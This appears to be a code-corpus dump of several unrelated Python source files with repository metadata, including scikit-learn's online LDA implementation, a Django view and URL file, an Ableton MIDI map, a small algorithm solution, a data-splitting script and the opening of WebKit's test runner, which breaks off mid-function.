raise RegistroNaoEncontradoException("Artista %s não encontrado" % artista_id)
def valida_preenchimento(self, dados):
if not dados.get('artista'):
raise ValorObrigatorioException('Artista é obrigatório')
if not dados.get('nome'):
raise ValorObrigatorioException('Nome do álbum é obrigatório')
if not dados.get('ano_lancamento'):
raise ValorObrigatorioException('Ano de lançamento é obrigatório')
if not dados.get('faixas'):
raise ValorObrigatorioException('Nr. de faixas é obrigatório')
class AlbumId(APIView):
def delete(self, request, pk):
album = AlbumModel.get_album_por_id(pk=pk)
if not album:
raise RegistroNaoEncontradoException("Álbum não encontrado")
album.delete()
return Response({'message': 'Álbum removido com sucesso'}, content_type='application/json')
| [
"[email protected]"
]
| |
384d1fd0f22eeef5459a04938bae73d253c4151e | 5a017fc861db92e3a2919f260d54f1301afbb3e5 | /MIDI Remote Scripts/_Framework/MidiMap.py | 815ac4dd8f4cd29c3396fee38203738716dd33b9 | []
| no_license | kera67/livepy_diff_ten | 8d8d0f3b76048f1fe5d4c0fbc02549dc922c7d5b | 12a0af9e9c57d0721af5036ce23af549df2c95f0 | refs/heads/master | 2023-07-14T18:26:33.591915 | 2020-11-19T07:50:28 | 2020-11-19T07:50:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,626 | py | from __future__ import absolute_import, print_function, unicode_literals
import Live
from .ButtonMatrixElement import ButtonMatrixElement
from .ButtonElement import ButtonElement
from .EncoderElement import EncoderElement
from .SliderElement import SliderElement
def make_button(name, channel, number, midi_message_type):
is_momentary = True
return ButtonElement(not is_momentary, midi_message_type, channel, number, name=name)
def make_slider(name, channel, number, midi_message_type):
return SliderElement(midi_message_type, channel, number, name=name)
def make_encoder(name, channel, number, midi_message_type):
return EncoderElement(midi_message_type, channel, number, Live.MidiMap.MapMode.absolute, name=name)
class MidiMap(dict):
def add_button(self, name, channel, number, midi_message_type):
assert name not in self.keys()
self[name] = make_button(name, channel, number, midi_message_type)
def add_matrix(self, name, element_factory, channel, numbers, midi_message_type):
assert name not in self.keys()
def one_dimensional_name(base_name, x, _y):
return u'%s[%d]' % (base_name, x)
def two_dimensional_name(base_name, x, y):
return u'%s[%d,%d]' % (base_name, x, y)
name_factory = two_dimensional_name if len(numbers) > 1 else one_dimensional_name
elements = [ [ element_factory(name_factory(name, column, row), channel, identifier, midi_message_type) for column, identifier in enumerate(identifiers) ] for row, identifiers in enumerate(numbers) ]
self[name] = ButtonMatrixElement(rows=elements)
| [
"[email protected]"
]
| |
21bd3a7d87ed73967ff064c91006700c3084477b | 2f55769e4d6bc71bb8ca29399d3809b6d368cf28 | /Miniconda2/Lib/site-packages/sklearn/decomposition/online_lda.py | b7a37d6f416b3f55958826c5a27b633245a724b6 | []
| no_license | jian9695/GSV2SVF | e5ec08b2d37dbc64a461449f73eb7388de8ef233 | 6ed92dac13ea13dfca80f2c0336ea7006a6fce87 | refs/heads/master | 2023-03-02T03:35:17.033360 | 2023-02-27T02:01:48 | 2023-02-27T02:01:48 | 199,570,103 | 9 | 16 | null | 2022-10-28T14:31:05 | 2019-07-30T03:47:41 | Python | UTF-8 | Python | false | false | 27,882 | py | """
=============================================================
Online Latent Dirichlet Allocation with variational inference
=============================================================
This implementation is modified from Matthew D. Hoffman's onlineldavb code
Link: http://matthewdhoffman.com/code/onlineldavb.tar
"""
# Author: Chyi-Kwei Yau
# Author: Matthew D. Hoffman (original onlineldavb implementation)
import numpy as np
import scipy.sparse as sp
from scipy.special import gammaln
import warnings
from ..base import BaseEstimator, TransformerMixin
from ..utils import (check_random_state, check_array,
gen_batches, gen_even_slices, _get_n_jobs)
from ..utils.validation import check_non_negative
from ..utils.extmath import logsumexp
from ..externals.joblib import Parallel, delayed
from ..externals.six.moves import xrange
from ..exceptions import NotFittedError
from ._online_lda import (mean_change, _dirichlet_expectation_1d,
_dirichlet_expectation_2d)
EPS = np.finfo(np.float).eps
def _update_doc_distribution(X, exp_topic_word_distr, doc_topic_prior,
max_iters,
mean_change_tol, cal_sstats, random_state):
"""E-step: update document-topic distribution.
Parameters
----------
X : array-like or sparse matrix, shape=(n_samples, n_features)
Document word matrix.
exp_topic_word_distr : dense matrix, shape=(n_topics, n_features)
Exponential value of expection of log topic word distribution.
In the literature, this is `exp(E[log(beta)])`.
doc_topic_prior : float
Prior of document topic distribution `theta`.
max_iters : int
Max number of iterations for updating document topic distribution in
the E-step.
mean_change_tol : float
Stopping tolerance for updating document topic distribution in E-setp.
cal_sstats : boolean
Parameter that indicate to calculate sufficient statistics or not.
Set `cal_sstats` to `True` when we need to run M-step.
random_state : RandomState instance or None
Parameter that indicate how to initialize document topic distribution.
Set `random_state` to None will initialize document topic distribution
to a constant number.
Returns
-------
(doc_topic_distr, suff_stats) :
`doc_topic_distr` is unnormalized topic distribution for each document.
In the literature, this is `gamma`. we can calculate `E[log(theta)]`
from it.
`suff_stats` is expected sufficient statistics for the M-step.
When `cal_sstats == False`, this will be None.
"""
is_sparse_x = sp.issparse(X)
n_samples, n_features = X.shape
n_topics = exp_topic_word_distr.shape[0]
if random_state:
doc_topic_distr = random_state.gamma(100., 0.01, (n_samples, n_topics))
else:
doc_topic_distr = np.ones((n_samples, n_topics))
# In the literature, this is `exp(E[log(theta)])`
exp_doc_topic = np.exp(_dirichlet_expectation_2d(doc_topic_distr))
# diff on `component_` (only calculate it when `cal_diff` is True)
suff_stats = np.zeros(exp_topic_word_distr.shape) if cal_sstats else None
if is_sparse_x:
X_data = X.data
X_indices = X.indices
X_indptr = X.indptr
for idx_d in xrange(n_samples):
if is_sparse_x:
ids = X_indices[X_indptr[idx_d]:X_indptr[idx_d + 1]]
cnts = X_data[X_indptr[idx_d]:X_indptr[idx_d + 1]]
else:
ids = np.nonzero(X[idx_d, :])[0]
cnts = X[idx_d, ids]
doc_topic_d = doc_topic_distr[idx_d, :]
# The next one is a copy, since the inner loop overwrites it.
exp_doc_topic_d = exp_doc_topic[idx_d, :].copy()
exp_topic_word_d = exp_topic_word_distr[:, ids]
# Iterate between `doc_topic_d` and `norm_phi` until convergence
for _ in xrange(0, max_iters):
last_d = doc_topic_d
# The optimal phi_{dwk} is proportional to
# exp(E[log(theta_{dk})]) * exp(E[log(beta_{dw})]).
norm_phi = np.dot(exp_doc_topic_d, exp_topic_word_d) + EPS
doc_topic_d = (exp_doc_topic_d *
np.dot(cnts / norm_phi, exp_topic_word_d.T))
# Note: adds doc_topic_prior to doc_topic_d, in-place.
_dirichlet_expectation_1d(doc_topic_d, doc_topic_prior,
exp_doc_topic_d)
if mean_change(last_d, doc_topic_d) < mean_change_tol:
break
doc_topic_distr[idx_d, :] = doc_topic_d
# Contribution of document d to the expected sufficient
# statistics for the M step.
if cal_sstats:
norm_phi = np.dot(exp_doc_topic_d, exp_topic_word_d) + EPS
suff_stats[:, ids] += np.outer(exp_doc_topic_d, cnts / norm_phi)
return (doc_topic_distr, suff_stats)
class LatentDirichletAllocation(BaseEstimator, TransformerMixin):
"""Latent Dirichlet Allocation with online variational Bayes algorithm
.. versionadded:: 0.17
Read more in the :ref:`User Guide <LatentDirichletAllocation>`.
Parameters
----------
n_topics : int, optional (default=10)
Number of topics.
doc_topic_prior : float, optional (default=None)
Prior of document topic distribution `theta`. If the value is None,
defaults to `1 / n_topics`.
In the literature, this is called `alpha`.
topic_word_prior : float, optional (default=None)
Prior of topic word distribution `beta`. If the value is None, defaults
to `1 / n_topics`.
In the literature, this is called `eta`.
learning_method : 'batch' | 'online', default='online'
Method used to update `_component`. Only used in `fit` method.
In general, if the data size is large, the online update will be much
faster than the batch update.
The default learning method is going to be changed to 'batch' in the 0.20 release.
Valid options::
'batch': Batch variational Bayes method. Use all training data in
each EM update.
Old `components_` will be overwritten in each iteration.
'online': Online variational Bayes method. In each EM update, use
mini-batch of training data to update the ``components_``
variable incrementally. The learning rate is controlled by the
``learning_decay`` and the ``learning_offset`` parameters.
learning_decay : float, optional (default=0.7)
It is a parameter that control learning rate in the online learning
method. The value should be set between (0.5, 1.0] to guarantee
asymptotic convergence. When the value is 0.0 and batch_size is
``n_samples``, the update method is same as batch learning. In the
literature, this is called kappa.
learning_offset : float, optional (default=10.)
A (positive) parameter that downweights early iterations in online
learning. It should be greater than 1.0. In the literature, this is
called tau_0.
max_iter : integer, optional (default=10)
The maximum number of iterations.
total_samples : int, optional (default=1e6)
Total number of documents. Only used in the `partial_fit` method.
batch_size : int, optional (default=128)
Number of documents to use in each EM iteration. Only used in online
learning.
evaluate_every : int optional (default=0)
How often to evaluate perplexity. Only used in `fit` method.
set it to 0 or negative number to not evalute perplexity in
training at all. Evaluating perplexity can help you check convergence
in training process, but it will also increase total training time.
Evaluating perplexity in every iteration might increase training time
up to two-fold.
perp_tol : float, optional (default=1e-1)
Perplexity tolerance in batch learning. Only used when
``evaluate_every`` is greater than 0.
mean_change_tol : float, optional (default=1e-3)
Stopping tolerance for updating document topic distribution in E-step.
max_doc_update_iter : int (default=100)
Max number of iterations for updating document topic distribution in
the E-step.
n_jobs : int, optional (default=1)
The number of jobs to use in the E-step. If -1, all CPUs are used. For
``n_jobs`` below -1, (n_cpus + 1 + n_jobs) are used.
verbose : int, optional (default=0)
Verbosity level.
random_state : int or RandomState instance or None, optional (default=None)
Pseudo-random number generator seed control.
Attributes
----------
components_ : array, [n_topics, n_features]
Topic word distribution. ``components_[i, j]`` represents word j in
topic `i`.
n_batch_iter_ : int
Number of iterations of the EM step.
n_iter_ : int
Number of passes over the dataset.
References
----------
[1] "Online Learning for Latent Dirichlet Allocation", Matthew D. Hoffman,
David M. Blei, Francis Bach, 2010
[2] "Stochastic Variational Inference", Matthew D. Hoffman, David M. Blei,
Chong Wang, John Paisley, 2013
[3] Matthew D. Hoffman's onlineldavb code. Link:
http://matthewdhoffman.com//code/onlineldavb.tar
"""
def __init__(self, n_topics=10, doc_topic_prior=None,
topic_word_prior=None, learning_method=None,
learning_decay=.7, learning_offset=10., max_iter=10,
batch_size=128, evaluate_every=-1, total_samples=1e6,
perp_tol=1e-1, mean_change_tol=1e-3, max_doc_update_iter=100,
n_jobs=1, verbose=0, random_state=None):
self.n_topics = n_topics
self.doc_topic_prior = doc_topic_prior
self.topic_word_prior = topic_word_prior
self.learning_method = learning_method
self.learning_decay = learning_decay
self.learning_offset = learning_offset
self.max_iter = max_iter
self.batch_size = batch_size
self.evaluate_every = evaluate_every
self.total_samples = total_samples
self.perp_tol = perp_tol
self.mean_change_tol = mean_change_tol
self.max_doc_update_iter = max_doc_update_iter
self.n_jobs = n_jobs
self.verbose = verbose
self.random_state = random_state
def _check_params(self):
"""Check model parameters."""
if self.n_topics <= 0:
raise ValueError("Invalid 'n_topics' parameter: %r"
% self.n_topics)
if self.total_samples <= 0:
raise ValueError("Invalid 'total_samples' parameter: %r"
% self.total_samples)
if self.learning_offset < 0:
raise ValueError("Invalid 'learning_offset' parameter: %r"
% self.learning_offset)
if self.learning_method not in ("batch", "online", None):
raise ValueError("Invalid 'learning_method' parameter: %r"
% self.learning_method)
def _init_latent_vars(self, n_features):
"""Initialize latent variables."""
self.random_state_ = check_random_state(self.random_state)
self.n_batch_iter_ = 1
self.n_iter_ = 0
if self.doc_topic_prior is None:
self.doc_topic_prior_ = 1. / self.n_topics
else:
self.doc_topic_prior_ = self.doc_topic_prior
if self.topic_word_prior is None:
self.topic_word_prior_ = 1. / self.n_topics
else:
self.topic_word_prior_ = self.topic_word_prior
init_gamma = 100.
init_var = 1. / init_gamma
# In the literature, this is called `lambda`
self.components_ = self.random_state_.gamma(
init_gamma, init_var, (self.n_topics, n_features))
# In the literature, this is `exp(E[log(beta)])`
self.exp_dirichlet_component_ = np.exp(
_dirichlet_expectation_2d(self.components_))
def _e_step(self, X, cal_sstats, random_init, parallel=None):
"""E-step in EM update.
Parameters
----------
X : array-like or sparse matrix, shape=(n_samples, n_features)
Document word matrix.
cal_sstats : boolean
Parameter that indicate whether to calculate sufficient statistics
or not. Set ``cal_sstats`` to True when we need to run M-step.
random_init : boolean
Parameter that indicate whether to initialize document topic
distribution randomly in the E-step. Set it to True in training
steps.
parallel : joblib.Parallel (optional)
Pre-initialized instance of joblib.Parallel.
Returns
-------
(doc_topic_distr, suff_stats) :
`doc_topic_distr` is unnormalized topic distribution for each
document. In the literature, this is called `gamma`.
`suff_stats` is expected sufficient statistics for the M-step.
When `cal_sstats == False`, it will be None.
"""
# Run e-step in parallel
random_state = self.random_state_ if random_init else None
# TODO: make Parallel._effective_n_jobs public instead?
n_jobs = _get_n_jobs(self.n_jobs)
if parallel is None:
parallel = Parallel(n_jobs=n_jobs, verbose=max(0, self.verbose - 1))
results = parallel(
delayed(_update_doc_distribution)(X[idx_slice, :],
self.exp_dirichlet_component_,
self.doc_topic_prior_,
self.max_doc_update_iter,
self.mean_change_tol, cal_sstats,
random_state)
for idx_slice in gen_even_slices(X.shape[0], n_jobs))
# merge result
doc_topics, sstats_list = zip(*results)
doc_topic_distr = np.vstack(doc_topics)
if cal_sstats:
# This step finishes computing the sufficient statistics for the
# M-step.
suff_stats = np.zeros(self.components_.shape)
for sstats in sstats_list:
suff_stats += sstats
suff_stats *= self.exp_dirichlet_component_
else:
suff_stats = None
return (doc_topic_distr, suff_stats)
def _em_step(self, X, total_samples, batch_update, parallel=None):
"""EM update for 1 iteration.
update `_component` by batch VB or online VB.
Parameters
----------
X : array-like or sparse matrix, shape=(n_samples, n_features)
Document word matrix.
total_samples : integer
Total umber of documents. It is only used when
batch_update is `False`.
batch_update : boolean
Parameter that controls updating method.
`True` for batch learning, `False` for online learning.
parallel : joblib.Parallel
Pre-initialized instance of joblib.Parallel
Returns
-------
doc_topic_distr : array, shape=(n_samples, n_topics)
Unnormalized document topic distribution.
"""
# E-step
_, suff_stats = self._e_step(X, cal_sstats=True, random_init=True,
parallel=parallel)
# M-step
if batch_update:
self.components_ = self.topic_word_prior_ + suff_stats
else:
# online update
# In the literature, the weight is `rho`
weight = np.power(self.learning_offset + self.n_batch_iter_,
-self.learning_decay)
doc_ratio = float(total_samples) / X.shape[0]
self.components_ *= (1 - weight)
self.components_ += (weight * (self.topic_word_prior_
+ doc_ratio * suff_stats))
# update `component_` related variables
self.exp_dirichlet_component_ = np.exp(
_dirichlet_expectation_2d(self.components_))
self.n_batch_iter_ += 1
return
def _check_non_neg_array(self, X, whom):
"""check X format
check X format and make sure no negative value in X.
Parameters
----------
X : array-like or sparse matrix
"""
X = check_array(X, accept_sparse='csr')
check_non_negative(X, whom)
return X
def partial_fit(self, X, y=None):
"""Online VB with Mini-Batch update.
Parameters
----------
X : array-like or sparse matrix, shape=(n_samples, n_features)
Document word matrix.
Returns
-------
self
"""
self._check_params()
X = self._check_non_neg_array(X,
"LatentDirichletAllocation.partial_fit")
n_samples, n_features = X.shape
batch_size = self.batch_size
# initialize parameters or check
if not hasattr(self, 'components_'):
self._init_latent_vars(n_features)
if n_features != self.components_.shape[1]:
raise ValueError(
"The provided data has %d dimensions while "
"the model was trained with feature size %d." %
(n_features, self.components_.shape[1]))
n_jobs = _get_n_jobs(self.n_jobs)
with Parallel(n_jobs=n_jobs, verbose=max(0, self.verbose - 1)) as parallel:
for idx_slice in gen_batches(n_samples, batch_size):
self._em_step(X[idx_slice, :],
total_samples=self.total_samples,
batch_update=False,
parallel=parallel)
return self
def fit(self, X, y=None):
"""Learn model for the data X with variational Bayes method.
When `learning_method` is 'online', use mini-batch update.
Otherwise, use batch update.
Parameters
----------
X : array-like or sparse matrix, shape=(n_samples, n_features)
Document word matrix.
Returns
-------
self
"""
self._check_params()
X = self._check_non_neg_array(X, "LatentDirichletAllocation.fit")
n_samples, n_features = X.shape
max_iter = self.max_iter
evaluate_every = self.evaluate_every
learning_method = self.learning_method
if learning_method == None:
warnings.warn("The default value for 'learning_method' will be "
"changed from 'online' to 'batch' in the release 0.20. "
"This warning was introduced in 0.18.",
DeprecationWarning)
learning_method = 'online'
batch_size = self.batch_size
# initialize parameters
self._init_latent_vars(n_features)
# change to perplexity later
last_bound = None
n_jobs = _get_n_jobs(self.n_jobs)
with Parallel(n_jobs=n_jobs, verbose=max(0, self.verbose - 1)) as parallel:
for i in xrange(max_iter):
if learning_method == 'online':
for idx_slice in gen_batches(n_samples, batch_size):
self._em_step(X[idx_slice, :], total_samples=n_samples,
batch_update=False, parallel=parallel)
else:
# batch update
self._em_step(X, total_samples=n_samples,
batch_update=True, parallel=parallel)
# check perplexity
if evaluate_every > 0 and (i + 1) % evaluate_every == 0:
doc_topics_distr, _ = self._e_step(X, cal_sstats=False,
random_init=False,
parallel=parallel)
bound = self.perplexity(X, doc_topics_distr,
sub_sampling=False)
if self.verbose:
print('iteration: %d, perplexity: %.4f'
% (i + 1, bound))
if last_bound and abs(last_bound - bound) < self.perp_tol:
break
last_bound = bound
self.n_iter_ += 1
return self
def transform(self, X):
"""Transform data X according to the fitted model.
Parameters
----------
X : array-like or sparse matrix, shape=(n_samples, n_features)
Document word matrix.
Returns
-------
doc_topic_distr : shape=(n_samples, n_topics)
Document topic distribution for X.
"""
if not hasattr(self, 'components_'):
raise NotFittedError("no 'components_' attribute in model."
" Please fit model first.")
# make sure feature size is the same in fitted model and in X
X = self._check_non_neg_array(X, "LatentDirichletAllocation.transform")
n_samples, n_features = X.shape
if n_features != self.components_.shape[1]:
raise ValueError(
"The provided data has %d dimensions while "
"the model was trained with feature size %d." %
(n_features, self.components_.shape[1]))
doc_topic_distr, _ = self._e_step(X, cal_sstats=False,
random_init=False)
# normalize doc_topic_distr
doc_topic_distr /= doc_topic_distr.sum(axis=1)[:, np.newaxis]
return doc_topic_distr
def _approx_bound(self, X, doc_topic_distr, sub_sampling):
"""Estimate the variational bound.
Estimate the variational bound over "all documents" using only the
documents passed in as X. Since log-likelihood of each word cannot
be computed directly, we use this bound to estimate it.
Parameters
----------
X : array-like or sparse matrix, shape=(n_samples, n_features)
Document word matrix.
doc_topic_distr : array, shape=(n_samples, n_topics)
Document topic distribution. In the literature, this is called
gamma.
sub_sampling : boolean, optional, (default=False)
Compensate for subsampling of documents.
It is used in calculate bound in online learning.
Returns
-------
score : float
"""
def _loglikelihood(prior, distr, dirichlet_distr, size):
# calculate log-likelihood
score = np.sum((prior - distr) * dirichlet_distr)
score += np.sum(gammaln(distr) - gammaln(prior))
score += np.sum(gammaln(prior * size) - gammaln(np.sum(distr, 1)))
return score
is_sparse_x = sp.issparse(X)
n_samples, n_topics = doc_topic_distr.shape
n_features = self.components_.shape[1]
score = 0
dirichlet_doc_topic = _dirichlet_expectation_2d(doc_topic_distr)
dirichlet_component_ = _dirichlet_expectation_2d(self.components_)
doc_topic_prior = self.doc_topic_prior_
topic_word_prior = self.topic_word_prior_
if is_sparse_x:
X_data = X.data
X_indices = X.indices
X_indptr = X.indptr
# E[log p(docs | theta, beta)]
for idx_d in xrange(0, n_samples):
if is_sparse_x:
ids = X_indices[X_indptr[idx_d]:X_indptr[idx_d + 1]]
cnts = X_data[X_indptr[idx_d]:X_indptr[idx_d + 1]]
else:
ids = np.nonzero(X[idx_d, :])[0]
cnts = X[idx_d, ids]
temp = (dirichlet_doc_topic[idx_d, :, np.newaxis]
+ dirichlet_component_[:, ids])
norm_phi = logsumexp(temp)
score += np.dot(cnts, norm_phi)
# compute E[log p(theta | alpha) - log q(theta | gamma)]
score += _loglikelihood(doc_topic_prior, doc_topic_distr,
dirichlet_doc_topic, self.n_topics)
# Compensate for the subsampling of the population of documents
if sub_sampling:
doc_ratio = float(self.total_samples) / n_samples
score *= doc_ratio
# E[log p(beta | eta) - log q (beta | lambda)]
score += _loglikelihood(topic_word_prior, self.components_,
dirichlet_component_, n_features)
return score
def score(self, X, y=None):
"""Calculate approximate log-likelihood as score.
Parameters
----------
X : array-like or sparse matrix, shape=(n_samples, n_features)
Document word matrix.
Returns
-------
score : float
Use approximate bound as score.
"""
X = self._check_non_neg_array(X, "LatentDirichletAllocation.score")
doc_topic_distr = self.transform(X)
score = self._approx_bound(X, doc_topic_distr, sub_sampling=False)
return score
def perplexity(self, X, doc_topic_distr=None, sub_sampling=False):
"""Calculate approximate perplexity for data X.
Perplexity is defined as exp(-1. * log-likelihood per word)
Parameters
----------
X : array-like or sparse matrix, [n_samples, n_features]
Document word matrix.
doc_topic_distr : None or array, shape=(n_samples, n_topics)
Document topic distribution.
If it is None, it will be generated by applying transform on X.
Returns
-------
score : float
Perplexity score.
"""
if not hasattr(self, 'components_'):
raise NotFittedError("no 'components_' attribute in model."
" Please fit model first.")
X = self._check_non_neg_array(X,
"LatentDirichletAllocation.perplexity")
if doc_topic_distr is None:
doc_topic_distr = self.transform(X)
else:
n_samples, n_topics = doc_topic_distr.shape
if n_samples != X.shape[0]:
raise ValueError("Number of samples in X and doc_topic_distr"
" do not match.")
if n_topics != self.n_topics:
raise ValueError("Number of topics does not match.")
current_samples = X.shape[0]
bound = self._approx_bound(X, doc_topic_distr, sub_sampling)
if sub_sampling:
word_cnt = X.sum() * (float(self.total_samples) / current_samples)
else:
word_cnt = X.sum()
perword_bound = bound / word_cnt
return np.exp(-1.0 * perword_bound)
| [
"[email protected]"
]
| |
1b06f8f93e9915353990e1e374d47340e80aacab | c3e70e85773da05cdf7375d34ebcb3a5560aaa9f | /Greedy/CodingTest_ver3/볼링공_고르기.py | 72a0ff9cc7e747edef4da3aec8ddef01c5732e23 | []
| no_license | hongyeon-kyeong/Algorithm | 5409f0472bd409b957f390b6adae0c67976dda85 | def11fd33f286013837317968991e6b87cc643c3 | refs/heads/main | 2023-04-01T13:43:35.982871 | 2021-03-23T12:20:20 | 2021-03-23T12:20:20 | 318,711,413 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 247 | py | n, m = map(int, input().split())
data = list(map(int, input().split()))
weights = [0] * (n+1)
for i in range(n) :
weights[data[i]] += 1
count = 0
for i in range(1, m+1) :
n -= weights[i]
count += (weights[i] * n)
print(count)
# 횟수단축 | [
"[email protected]"
]
| |
2dcca14dad5d66de58e425dcc274f0f0a2df7e22 | f4f0b7feb71ba719b373735bc39efb2ebcdddcd8 | /solution/ourFeature/pre.py | a09d54d5798f50e05dcbb9afe0a3cb80329aa5e7 | []
| no_license | fuhailin/2018-Big-Data-Challenge | 112ef765e9866f1b6e521711100aff871d66cb27 | 419db72e110079f208197e9bd8dee0991a72f5a1 | refs/heads/master | 2020-03-20T03:59:15.308366 | 2018-06-26T15:01:50 | 2018-06-26T15:01:50 | 137,166,621 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,778 | py | """
author: yang yiqing
comment: 数据预处理
date: 2018年06月16日16:32:00
"""
import pandas as pd
import numpy as np
def split_data(action, launch, register, video):
print('split data...')
for i in range(Num_dataSet):
start_date = start_date_list[i]
end_date = end_date_list[i]
temp_action = action[(action.day >= start_date) & (action.day <= end_date)]
temp_launch = launch[(launch.day >= start_date) & (launch.day <= end_date)]
temp_register = register[(register.day >= start_date) & (register.day <= end_date)]
temp_video = video[(video.day >= start_date) & (video.day <= end_date)]
temp_all_user = np.unique(
temp_action['user_id'].tolist() + temp_register['user_id'].tolist() + temp_launch['user_id'].tolist() +
temp_video['user_id'].tolist())
temp_label_user = np.unique(
action[(action.day > end_date) & (action.day <= end_date + 7)]['user_id'].tolist() +
launch[(launch.day > end_date) & (launch.day <= end_date + 7)]['user_id'].tolist() +
register[(register.day > end_date) & (register.day <= end_date + 7)]['user_id'].tolist() +
video[(video.day > end_date) & (video.day <= end_date + 7)]['user_id'].tolist())
# get label
temp_DF = get_label(temp_all_user, temp_label_user)
# save file
# df中是user_id和label,其他日志文件通过user_id来left merge到df中即可
temp_DF.to_csv('splited_date/df_%d_%d.csv' % (start_date, end_date))
temp_action.to_csv('splited_date/action_%d_%d.csv' % (start_date, end_date))
temp_launch.to_csv('splited_date/launch_%d_%d.csv' % (start_date, end_date))
temp_register.to_csv('splited_date/register_%d_%d.csv' % (start_date, end_date))
temp_video.to_csv('splited_date/video_%d_%d.csv' % (start_date, end_date))
def get_label(all_user, label_user):
print('get label...')
print(len(all_user))
# 测试集的label全为0
print(len(label_user))
df = pd.DataFrame()
df['user_id'] = all_user
label = np.zeros(len(all_user))
for i in range(len(all_user)):
label[i] = 1 if all_user[i] in label_user else 0
df['label'] = label
df['label'] = df['label'].astype(int)
return df
if __name__ == '__main__':
# 修改时间窗只需要修改下面的参数即可
Num_dataSet = 3
start_date_list = [1, 8, 15]
end_date_list = [16, 23, 30]
# read data
action = pd.read_csv('data/action.csv', index_col=0)
launch = pd.read_csv('data/launcher.csv', index_col=0)
register = pd.read_csv('data/register.csv', index_col=0)
video = pd.read_csv('data/video.csv', index_col=0)
split_data(action, launch, register, video)
| [
"[email protected]"
]
| |
e50058dbb805fd455badad57c4025ef3de68f4d1 | cd594b9a01ca5a587c0d30c9b41fa099af93f98e | /books/orders/urls.py | 30c514984788da44c258b8c65bb0ef4be70779ed | []
| no_license | raj713335/Django_Professional | 54bf628aa75d81ef2266d6a0c6b53d1705744f3d | 96daff2dc38cda21aa9683ca0b023cd55705323f | refs/heads/master | 2023-02-07T17:04:11.668927 | 2020-12-30T11:11:23 | 2020-12-30T11:11:23 | 324,566,618 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 206 | py | # orders/urls.py
from django.urls import path
from .views import OrdersPageView, charge
urlpatterns = [
path('charge/', charge, name='charge'),
path('', OrdersPageView.as_view(), name='orders'),
] | [
"[email protected]"
]
| |
7a93e339349e3da4a0f28f244e96094fde8714f8 | dd80a584130ef1a0333429ba76c1cee0eb40df73 | /external/chromium_org/third_party/WebKit/Tools/Scripts/webkitpy/test/main.py | c9a68abbaf0f54b3f78c3123aacd990da38fff79 | [
"GPL-1.0-or-later",
"LGPL-2.0-or-later",
"Apache-2.0",
"MIT",
"BSD-3-Clause"
]
| permissive | karunmatharu/Android-4.4-Pay-by-Data | 466f4e169ede13c5835424c78e8c30ce58f885c1 | fcb778e92d4aad525ef7a995660580f948d40bc9 | refs/heads/master | 2021-03-24T13:33:01.721868 | 2017-02-18T17:48:49 | 2017-02-18T17:48:49 | 81,847,777 | 0 | 2 | MIT | 2020-03-09T00:02:12 | 2017-02-13T16:47:00 | null | UTF-8 | Python | false | false | 10,169 | py | # Copyright (C) 2012 Google, Inc.
# Copyright (C) 2010 Chris Jerdonek ([email protected])
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY APPLE INC. AND ITS CONTRIBUTORS ``AS IS'' AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL APPLE INC. OR ITS CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""unit testing code for webkitpy."""
import logging
import multiprocessing
import optparse
import os
import StringIO
import sys
import time
import traceback
import unittest
from webkitpy.common.webkit_finder import WebKitFinder
from webkitpy.common.system.filesystem import FileSystem
from webkitpy.test.finder import Finder
from webkitpy.test.printer import Printer
from webkitpy.test.runner import Runner, unit_test_name
_log = logging.getLogger(__name__)
up = os.path.dirname
webkit_root = up(up(up(up(up(os.path.abspath(__file__))))))
def main():
filesystem = FileSystem()
wkf = WebKitFinder(filesystem)
tester = Tester(filesystem, wkf)
tester.add_tree(wkf.path_from_webkit_base('Tools', 'Scripts'), 'webkitpy')
tester.skip(('webkitpy.common.checkout.scm.scm_unittest',), 'are really, really, slow', 31818)
if sys.platform == 'win32':
tester.skip(('webkitpy.common.checkout', 'webkitpy.common.config', 'webkitpy.tool', 'webkitpy.w3c', 'webkitpy.layout_tests.layout_package.bot_test_expectations'), 'fail horribly on win32', 54526)
# This only needs to run on Unix, so don't worry about win32 for now.
appengine_sdk_path = '/usr/local/google_appengine'
if os.path.exists(appengine_sdk_path):
if not appengine_sdk_path in sys.path:
sys.path.append(appengine_sdk_path)
import dev_appserver
from google.appengine.dist import use_library
use_library('django', '1.2')
dev_appserver.fix_sys_path()
tester.add_tree(wkf.path_from_webkit_base('Tools', 'TestResultServer'))
else:
_log.info('Skipping TestResultServer tests; the Google AppEngine Python SDK is not installed.')
return not tester.run()
class Tester(object):
def __init__(self, filesystem=None, webkit_finder=None):
self.filesystem = filesystem or FileSystem()
self.finder = Finder(self.filesystem)
self.printer = Printer(sys.stderr)
self.webkit_finder = webkit_finder or WebKitFinder(self.filesystem)
self._options = None
def add_tree(self, top_directory, starting_subdirectory=None):
self.finder.add_tree(top_directory, starting_subdirectory)
def skip(self, names, reason, bugid):
self.finder.skip(names, reason, bugid)
def _parse_args(self, argv=None):
parser = optparse.OptionParser(usage='usage: %prog [options] [args...]')
parser.add_option('-a', '--all', action='store_true', default=False,
help='run all the tests')
parser.add_option('-c', '--coverage', action='store_true', default=False,
help='generate code coverage info')
parser.add_option('-i', '--integration-tests', action='store_true', default=False,
help='run integration tests as well as unit tests'),
